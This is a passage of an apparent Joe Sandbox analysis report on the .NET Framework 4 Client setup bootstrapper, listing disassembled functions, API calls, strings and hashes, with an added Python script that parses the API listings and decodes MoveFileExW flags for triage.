                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00015AF6,X?f), ref: 0001A663
                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,00015AF6,X?f), ref: 0001A666
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                     • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                     • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                     • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                     • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$Process$AllocAllocateErrorFileLast$FreePointerRead
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 15841721-0
                                                                                                                                                                    • Opcode ID: 923783a5a02161f4cd5d2a019e85e3e459cf5be7f64b2d20c66fbc81479b3dd8
                                                                                                                                                                    • Instruction ID: fb98d2a2e38ce7a5480867ca4da80df995e8aadd1feacd8948be0cb13dbd6fc7
                                                                                                                                                                    • Opcode Fuzzy Hash: 923783a5a02161f4cd5d2a019e85e3e459cf5be7f64b2d20c66fbc81479b3dd8
                                                                                                                                                                    • Instruction Fuzzy Hash: DE4105B1E0121AEFDF119FE5C944BEEBBB8FF09344F14805AE604E6250D7789A909B91
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                                                                    control_flow_graph 566 17ae7-17b0c SetErrorMode * 2 567 17b0f-17b1c call 1746a 566->567 570 17b22-17b3d call 18b7e 567->570 571 17bec-17bf1 567->571 577 17bf3-17bf8 570->577 578 17b43-17b55 call 19926 570->578 572 17bff-17c07 call 1854a 571->572 579 17bc4-17bc7 572->579 577->572 584 17b5b-17b6b CreateDirectoryW 578->584 585 17bfa 578->585 582 17bd1-17bd4 579->582 583 17bc9-17bcc call 18e6f 579->583 587 17bd6-17bd9 call 18e6f 582->587 588 17bde-17be9 SetErrorMode 582->588 583->582 589 17b82-17b84 584->589 590 17b6d-17b76 RemoveDirectoryW 584->590 585->572 587->588 593 17b86-17b87 call 18e6f 589->593 594 17b8c-17b8f 589->594 590->589 592 17b78-17b7c MoveFileExW 590->592 592->589 593->594 596 17b91-17b94 call 18e6f 594->596 597 17b99-17b9c 594->597 596->597 599 17ba6-17baf 597->599 600 17b9e-17ba1 call 18e6f 597->600 602 17bb1-17bbb 599->602 603 17c09-17c0b 599->603 600->599 602->567 604 17bc1-17bc3 602->604 603->588 604->579
APIs
• SetErrorMode.KERNEL32(00000000,00000000,?,?,?,?,?,000178B7,?,?), ref: 00017B01
• SetErrorMode.KERNELBASE(00000000,?,?,?,000178B7,?,?,?,?,?,?,?,?,?,?,00016F09), ref: 00017B0A
  • Part of subcall function 0001746A: UuidCreate.RPCRT4(?), ref: 00017496
  • Part of subcall function 0001746A: RpcStringFreeW.RPCRT4(00000000), ref: 000174FF
• CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?,000178B7,?,?), ref: 00017B60
• RemoveDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,000178B7,?,?), ref: 00017B6E
• MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,?,?,?,?,000178B7,?,?), ref: 00017B7C
• SetErrorMode.KERNELBASE(?,?,?,?,?,000178B7,?,?), ref: 00017BE1
Strings
• Unable to generate random directory name, xrefs: 00017BF3
• Failed to allocate long path, xrefs: 00017BFA
• %s%s, xrefs: 00017B2B
• Unable to generate random name, xrefs: 00017BEC
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: ErrorMode$CreateDirectory$FileFreeMoveRemoveStringUuid
• String ID: %s%s$Failed to allocate long path$Unable to generate random directory name$Unable to generate random name
• API String ID: 1102146613-1274944306
• Opcode ID: 8ad37264d1d925ddc8547c79ae266ae125da0cc63e616e8120224d6cf1472fed
• Instruction ID: 69b253011b60fe6c0482ac4fa19da0cb40d82014d192890807fde2b1a5bc3cd2
• Opcode Fuzzy Hash: 8ad37264d1d925ddc8547c79ae266ae125da0cc63e616e8120224d6cf1472fed
• Instruction Fuzzy Hash: 30313E71D08269EFCF21AFE48CC19DEBAB9AF04714F21856AE605B2112DB744FC19B91
Uniqueness
Uniqueness Score: -1.00%
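The API lists in this report are rendered as `Name.Module(values), ref: address`, where the values appear to be the argument slots observed at the call site and `?` marks a value the analyzer could not resolve (that column semantics is an assumption here, not stated by the report). Read that way, the function at 17ae7 is a temp-directory routine: UuidCreate produces a random name, CreateDirectoryW creates it, and on the failure path MoveFileExW is called with lpNewFileName NULL and dwFlags 00000004, which is MOVEFILE_DELAY_UNTIL_REBOOT and therefore queues the path for deletion at next boot (PendingFileRenameOperations). The Python below is an added example, not code from the Joe Sandbox report or from the analysed binary: it parses lines in this listing format and decodes the MoveFileExW flags. The sample input is constructed from lines of this section; the flag names are the winbase.h constants, and the parameter positions assume the documented MoveFileExW prototype.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample input in the shape of the "APIs" list the report prints
# under each disassembled function (lines taken from the function at 17ae7,
# plus one GetLastError and one SetFileTime line from other functions).
SAMPLE_APIS = """\
• SetErrorMode.KERNEL32(00000000,00000000,?,?,?,?,?,000178B7,?,?), ref: 00017B01
  • Part of subcall function 0001746A: UuidCreate.RPCRT4(?), ref: 00017496
  • Part of subcall function 0001746A: RpcStringFreeW.RPCRT4(00000000), ref: 000174FF
• CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?,000178B7,?,?), ref: 00017B60
• RemoveDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,000178B7,?,?), ref: 00017B6E
• MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,?,?,?,?,000178B7,?,?), ref: 00017B7C
• GetLastError.KERNEL32 ref: 0001A60C
• SetFileTime.KERNELBASE(?,?,?,?), ref: 0001B0F7
"""

# One listing line: optional "Part of subcall function XXXX:" prefix, then
# Name.Module, an optional "(...)" value list, then ", ref: ADDR".
_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<subcall>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# MoveFileExW dwFlags bits (winbase.h).
MOVEFILE_FLAGS = {
    0x1: "MOVEFILE_REPLACE_EXISTING",
    0x2: "MOVEFILE_COPY_ALLOWED",
    0x4: "MOVEFILE_DELAY_UNTIL_REBOOT",
    0x8: "MOVEFILE_WRITE_THROUGH",
    0x10: "MOVEFILE_CREATE_HARDLINK",
    0x20: "MOVEFILE_FAIL_IF_NOT_TRACKABLE",
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Optional[int]]          # None where the report printed "?"
    ref: int
    subcall_of: Optional[int] = None   # address of the callee the line belongs to
    notes: List[str] = field(default_factory=list)


def _parse_arg(tok: str) -> Optional[int]:
    tok = tok.strip()
    if not tok or tok == "?":
        return None
    try:
        return int(tok, 16)
    except ValueError:
        return None  # e.g. the "X?f" fragments the report sometimes shows


def decode_movefileex_flags(flags: int) -> List[str]:
    """Expand a MoveFileExW dwFlags value into symbolic names, keeping unknown bits."""
    names = [n for bit, n in MOVEFILE_FLAGS.items() if flags & bit]
    leftover = flags & ~sum(MOVEFILE_FLAGS)
    if leftover:
        names.append(f"UNKNOWN_0x{leftover:X}")
    return names


def annotate(call: ApiCall) -> None:
    """Attach triage notes for APIs whose argument values carry meaning."""
    if call.name == "MoveFileExW" and len(call.args) >= 3 and call.args[2] is not None:
        call.notes.extend(decode_movefileex_flags(call.args[2]))
        # Documented special case: NULL lpNewFileName together with
        # MOVEFILE_DELAY_UNTIL_REBOOT deletes the file at the next boot.
        if call.args[2] & 0x4 and call.args[1] == 0:
            call.notes.append("delete-on-reboot")


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every recognizable listing line; lines in another shape are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [_parse_arg(a) for a in raw.split(",")] if raw is not None else []
        call = ApiCall(
            name=m.group("name"),
            module=m.group("module"),
            args=args,
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("subcall"), 16) if m.group("subcall") else None,
        )
        annotate(call)
        calls.append(call)
    return calls


if __name__ == "__main__":
    for c in parse_api_lines(SAMPLE_APIS):
        where = f" (in {c.subcall_of:08X})" if c.subcall_of is not None else ""
        print(f"{c.ref:08X} {c.module}!{c.name}{where} {' '.join(c.notes)}")
```

Run against a whole report section, the `notes` field is what you grep for in bulk triage: a `delete-on-reboot` hit with a path under a writable location is worth a look, while in this dump it belongs to the .NET Framework bootstrapper (snapshot `dotNetFx40_Client_setup`) cleaning up a temp directory it could not remove immediately. Argument columns beyond an API's real parameter count are stack residue and should not be decoded.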

Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                                                                    control_flow_graph 951 17cd0-17d00 call 187eb 954 17d02 951->954 955 17d14-17d1d call 1805a 951->955 956 17d07-17d0f call 1854a 954->956 961 17d26 955->961 962 17d1f-17d24 955->962 963 17e80-17e83 956->963 964 17d2d-17d32 961->964 962->956 965 17e85-17e88 call 18e6f 963->965 966 17e8d-17e90 963->966 969 17d34-17d3e GetLastError 964->969 970 17d5c-17d6a 964->970 965->966 967 17e92-17e95 call 18e6f 966->967 968 17e9a-17e9d 966->968 967->968 973 17ead-17eb0 968->973 974 17e9f-17ea6 968->974 975 17d40-17d4c 969->975 976 17d4e 969->976 983 17d97-17da4 970->983 984 17d6c-17d76 GetLastError 970->984 981 17ec0-17ec3 973->981 982 17eb2-17eb9 973->982 974->973 979 17ea8 974->979 975->976 977 17d50 976->977 978 17d55-17d5a 976->978 977->978 978->956 979->973 986 17ed3-17ed8 981->986 987 17ec5-17ecc 981->987 982->981 985 17ebb 982->985 990 17e3c-17e45 call 18341 983->990 988 17d86 984->988 989 17d78-17d84 984->989 985->981 987->986 991 17ece 987->991 993 17d88 988->993 994 17d8d-17d92 988->994 989->988 996 17da9-17dac 990->996 997 17e4b-17e50 990->997 991->986 993->994 994->956 999 17e52-17e5d 996->999 1000 17db2-17de1 call 184c7 call 17ee0 996->1000 998 17e6b-17e72 call 1854a 997->998 1001 17e73-17e76 998->1001 999->1001 1011 17de3-17de6 1000->1011 1012 17e5f-17e64 1000->1012 1001->963 1005 17e78-17e7b call 18e6f 1001->1005 1005->963 1013 17de8-17e0d call 184c7 call 18abb 1011->1013 1014 17e0f-17e1e 1011->1014 1012->998 1013->1014 1023 17e66 1013->1023 1019 17e20-17e23 call 18e6f 1014->1019 1020 17e28-17e39 1014->1020 1019->1020 1020->990 1023->998
APIs
  • Part of subcall function 000187EB: GetProcessHeap.KERNEL32(00000000,?,00000040,00000040,0001917A,00000000,0003BF10,?,?,00016C1A,0000000B,?,?,00016AF8,?), ref: 00018802
  • Part of subcall function 000187EB: HeapReAlloc.KERNEL32(00000000,?,00000040,00000040,0001917A,00000000,0003BF10,?,?,00016C1A,0000000B,?,?,00016AF8,?), ref: 00018809
• GetLastError.KERNEL32(?,?,?,00017780,?,00000000,00000000,X?f,?,?,00016F09,?,?,00000000), ref: 00017D34
• GetLastError.KERNEL32(?,?,?,00017780,?,00000000,00000000,X?f,?,?,00016F09,?,?,00000000), ref: 00017D6C
  • Part of subcall function 000184C7: GetLocalTime.KERNEL32(?,?,00000000), ref: 000184E2
  • Part of subcall function 000184C7: swprintf.LIBCMT ref: 00018513
Strings
• Drive map for cluster resource '%S' : '%S', xrefs: 00017DEE
• Failed to get the next resource in the cluster enum, xrefs: 00017E4B
• Failed to allocate an empty drive map, xrefs: 00017D02
• Failed to concatenate to the cluster drive map, xrefs: 00017E66
• Failed to get cluster drive map from resource, xrefs: 00017E5F
• Considering cluster resource: '%S'..., xrefs: 00017DB5
• Failed to initialize the Cluster API, xrefs: 00017D1F
• Failed to open the clsuter enumeration for resources, xrefs: 00017D8D
• Failed to open the current cluster, xrefs: 00017D55
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: ErrorHeapLast$AllocLocalProcessTimeswprintf
• String ID: Considering cluster resource: '%S'...$Drive map for cluster resource '%S' : '%S'$Failed to allocate an empty drive map$Failed to concatenate to the cluster drive map$Failed to get cluster drive map from resource$Failed to get the next resource in the cluster enum$Failed to initialize the Cluster API$Failed to open the clsuter enumeration for resources$Failed to open the current cluster
• API String ID: 196121278-1807027133
• Opcode ID: ab354f9c462a6aecb8b03ecdfd72e754a8998e17d1d7fce28eb545512319a32b
• Instruction ID: 339f965fc4abe695e7077b1c7fba22a5c1bbb60cb06356c700072e29cbe1281d
• Opcode Fuzzy Hash: ab354f9c462a6aecb8b03ecdfd72e754a8998e17d1d7fce28eb545512319a32b
• Instruction Fuzzy Hash: A0512A76C0421AAFCF21AFE4DC858EEBAF5AF08300F2545B9E619B7151DB350EC09B91
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                                                                    control_flow_graph 1024 1b07f-1b0a2 1025 1b234-1b23c 1024->1025 1026 1b0a8-1b0a9 1024->1026 1027 1b243 1025->1027 1028 1b23e-1b241 1025->1028 1029 1b15a-1b174 call 18b7e 1026->1029 1030 1b0af-1b0b0 1026->1030 1031 1b246-1b24a 1027->1031 1028->1031 1036 1b226-1b22a 1029->1036 1040 1b17a-1b17f 1029->1040 1033 1b0b2-1b0b3 1030->1033 1034 1b0be-1b0da DosDateTimeToFileTime 1030->1034 1033->1036 1037 1b0b9 1033->1037 1038 1b0fd-1b10c FindCloseChangeNotification 1034->1038 1039 1b0dc-1b0ec LocalFileTimeToFileTime 1034->1039 1036->1025 1042 1b22c-1b22f call 18e6f 1036->1042 1037->1025 1043 1b14b-1b155 1038->1043 1044 1b10e-1b128 call 18b7e 1038->1044 1039->1038 1041 1b0ee-1b0f7 SetFileTime 1039->1041 1046 1b181-1b18c 1040->1046 1047 1b196-1b1b6 call 196c7 call 191d3 1040->1047 1041->1038 1042->1025 1045 1b224 1043->1045 1044->1036 1052 1b12e-1b138 1044->1052 1045->1036 1071 1b18e call 169b0 1046->1071 1072 1b18e call 164d8 1046->1072 1047->1036 1059 1b1b8-1b1da call 19ca3 1047->1059 1069 1b13a call 169b0 1052->1069 1070 1b13a call 164d8 1052->1070 1053 1b190-1b194 1053->1047 1055 1b143-1b146 1053->1055 1055->1036 1058 1b13d-1b141 1058->1043 1058->1055 1062 1b1dc-1b1e6 GetLastError 1059->1062 1063 1b1ff-1b210 SetFilePointer 1059->1063 1064 1b1f6 1062->1064 1065 1b1e8-1b1f4 1062->1065 1066 1b221 1063->1066 1067 1b212-1b21f SetEndOfFile SetFilePointer 1063->1067 1064->1036 1068 1b1f8-1b1fd 1064->1068 1065->1064 1066->1045 1067->1066 1068->1036 1069->1058 1070->1058 1071->1053 1072->1053
APIs
• DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 0001B0D2
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0001B0E4
• SetFileTime.KERNELBASE(?,?,?,?), ref: 0001B0F7
• FindCloseChangeNotification.KERNELBASE(?), ref: 0001B100
• GetLastError.KERNEL32(?,40000000,00000001,00000002,08000080,?,00000000), ref: 0001B1DC
Strings
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: Time$File$ChangeCloseDateErrorFindLastLocalNotification
• String ID: %s%S
• API String ID: 604158762-4203644592
• Opcode ID: 5a4f2cefa02dc0aefd0e8d7135a3a8a91601ffd58297967e230a4cbaa37cb24f
• Instruction ID: 1875cdb06d5a0326164c6c9d3c30131a6c45d6b2b59a5d88888529a053943392
• Opcode Fuzzy Hash: 5a4f2cefa02dc0aefd0e8d7135a3a8a91601ffd58297967e230a4cbaa37cb24f
• Instruction Fuzzy Hash: 25516E75A00706BBEB219FE5DC80BFA77E8EF08310F108529FA15D6151DBB4DA84CB50
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                                                                    control_flow_graph 1073 1ab0c-1ab3a call 19b6a 1076 1ac51-1ac61 call 291d5 1073->1076 1077 1ab40-1ab55 ReadFile 1073->1077 1078 1ab57-1ab62 GetLastError 1077->1078 1079 1ab86-1ab8a 1077->1079 1081 1ab71-1ab74 1078->1081 1082 1ab64-1ab6e 1078->1082 1083 1ab98-1abb0 GetProcessHeap HeapAlloc 1079->1083 1084 1ab8c-1ab93 1079->1084 1081->1076 1086 1ab7a-1ab81 1081->1086 1082->1081 1087 1abb2-1abb9 1083->1087 1088 1abbe-1abcb 1083->1088 1084->1076 1086->1076 1087->1076 1089 1abce-1abe9 ReadFile 1088->1089 1090 1ac01-1ac0c GetLastError 1089->1090 1091 1abeb-1abf1 1089->1091 1093 1ac1b-1ac1e 1090->1093 1094 1ac0e-1ac18 1090->1094 1091->1089 1092 1abf3-1abf6 1091->1092 1097 1ac29-1ac2f 1092->1097 1098 1abf8-1abff 1092->1098 1095 1ac20-1ac27 1093->1095 1096 1ac32-1ac35 1093->1096 1094->1093 1095->1096 1096->1076 1099 1ac37-1ac4a GetProcessHeap HeapFree 1096->1099 1097->1096 1098->1096 1099->1076 1100 1ac4c call 19a29 1099->1100 1100->1076
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00019B6A: SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0001A52C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00019B82
                                                                                                                                                                      • Part of subcall function 00019B6A: GetLastError.KERNEL32(?,?,?,0001A52C,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00015AF6,X?f), ref: 00019B8C
                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00019ECF,00000024,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,00019ECF,?), ref: 0001AB4D
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00019ECF,?,?,00016163,?,?,?,00000000,00000000), ref: 0001AB57
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0001AB9C
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0001ABA3
                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,?,00000024,00000000), ref: 0001ABE1
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0001AC3B
                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0001AC42
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$File$ErrorLastProcessRead$AllocFreePointer
                                                                                                                                                                    • String ID: $
                                                                                                                                                                    • API String ID: 1504513977-3993045852
                                                                                                                                                                    • Opcode ID: d3a7a1693e2d08e7c31983e8da72649645f83855e77888a99dc6f62216986788
                                                                                                                                                                    • Instruction ID: a94cc14e6084c81afc04f8b835f9b28ba72159c53fe917574fd745561504d5c7
                                                                                                                                                                    • Opcode Fuzzy Hash: d3a7a1693e2d08e7c31983e8da72649645f83855e77888a99dc6f62216986788
                                                                                                                                                                    • Instruction Fuzzy Hash: C8414B71E01218EFCF119FA9ED88AEDBBB9FF49710B108419F511E6111D3749880DFA6
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 0001860A
• _memset.LIBCMT ref: 00018622
• GetComputerNameW.KERNEL32(?,?), ref: 00018667
• _memset.LIBCMT ref: 0001867A
Strings
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: Name_memset$ComputerFileModule
• String ID: --- logging level: %s ---$=== Logging started: %S ===$Executable: %S v%d.%d.%d.%d$standard
• API String ID: 949451329-1073105773
• Opcode ID: cfa8e1e710044b6d2fa0e7a004c1e571b6d89dd8232b83a4b355f70af1a7cb09
• Instruction ID: 5043d6840d2a4463e884d208057156b1cca036664ac294ea3fc86a85f17c4469
• Opcode Fuzzy Hash: cfa8e1e710044b6d2fa0e7a004c1e571b6d89dd8232b83a4b355f70af1a7cb09
• Instruction Fuzzy Hash: 483184F290022CABDB21AB559C45EDAB7FCEB44704F1081A6B709E2142DE759FC58BA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(00000000,00000082,00000000,00017016,X?f,?,?,00000000,X?f,?,?,?,00016F09,?,?,00000000), ref: 00016FD6
• DialogBoxParamW.USER32(00000000,?,?,00016F09,?), ref: 00016FDD
Strings
• Failed to get current directory, xrefs: 00016F8F
• Failed to select current directory for extraction, xrefs: 00016FA0
• X?f, xrefs: 00016F63, 00016FC9
• Failed to select the user-specified directory for extraction, xrefs: 00016FFA
• Failed to select temporary directory for extraction, xrefs: 00016FB8
• Failed while running the extract directory selection dialog., xrefs: 00016FE9
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: DialogHandleModuleParam
• String ID: Failed to get current directory$Failed to select current directory for extraction$Failed to select temporary directory for extraction$Failed to select the user-specified directory for extraction$Failed while running the extract directory selection dialog.$X?f
• API String ID: 3900296288-2009531167
• Opcode ID: 71193d733ddf07c5540625584439e4b9942d4734862182815a68e0bc35665d56
• Instruction ID: 146b20e26d1a041dc41b0ff3323a0f68b483c599f8adbbf8d6853d2f6fd89f08
• Opcode Fuzzy Hash: 71193d733ddf07c5540625584439e4b9942d4734862182815a68e0bc35665d56
• Instruction Fuzzy Hash: BD11CB32949B10AECF376A54AC41CFA77E8DB94770320413EF958A7146E9668EC34691
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindCloseChangeNotification.KERNELBASE(?,000161FB,00000000,00000000,?,?,?,?,?,00015B19,?,?,?,X?f), ref: 0001A476
• GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,000161FB,00000000,00000000,?,?,?,?,?,00015B19,?,?,?), ref: 0001A494
• HeapFree.KERNEL32(00000000,?,?,?,?,00015B19,?,?,?,X?f), ref: 0001A497
• GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,000161FB,00000000,00000000,?,?,?,?,?,00015B19,?,?,?), ref: 0001A4AC
• HeapFree.KERNEL32(00000000,?,?,?,?,00015B19,?,?,?,X?f), ref: 0001A4AF
• GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,000161FB,00000000,00000000,?,?,?,?,?,00015B19,?,?,?), ref: 0001A4C4
• HeapFree.KERNEL32(00000000,?,?,?,?,00015B19,?,?,?,X?f), ref: 0001A4C7
• GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,000161FB,00000000,00000000,?,?,?,?,?,00015B19,?,?,?), ref: 0001A4EF
• HeapFree.KERNEL32(00000000,?,?,?,?,00015B19,?,?,?,X?f), ref: 0001A4F2
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: Heap$FreeProcess$ChangeCloseFindNotification
• String ID:
• API String ID: 128005546-0
• Opcode ID: 8231aca45148f39e1a8cd4d501d8f326eba6f17aa509a2b5ae7a28602e468478
• Instruction ID: a003e93f5e1bdc4f59659da668c97805dc491ddb7e9e44213c21601ae39a7f75
• Opcode Fuzzy Hash: 8231aca45148f39e1a8cd4d501d8f326eba6f17aa509a2b5ae7a28602e468478
• Instruction Fuzzy Hash: 63014070701211ABEB60BBF69D49FEB3ADC9FD1B91F448011FD04D7186EAA4DC808A72
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetFileVersionInfoSizeW.KERNELBASE(?,?,00000000,?,00000208,?,?,?,?), ref: 00019A98
• GetLastError.KERNEL32(?,?,?,?), ref: 00019AA4
• GlobalAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 00019AD0
• GetFileVersionInfoW.KERNELBASE(?,?,00000000,00000000,?,?,?,?), ref: 00019AEC
• VerQueryValueW.VERSION(?,000150AC,?,?,?,?,?,?), ref: 00019B06
• GetLastError.KERNEL32(?,?,?,?), ref: 00019B10
• GlobalFree.KERNEL32(?), ref: 00019B49
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: ErrorFileGlobalInfoLastVersion$AllocFreeQuerySizeValue
• String ID:
• API String ID: 2886811419-0
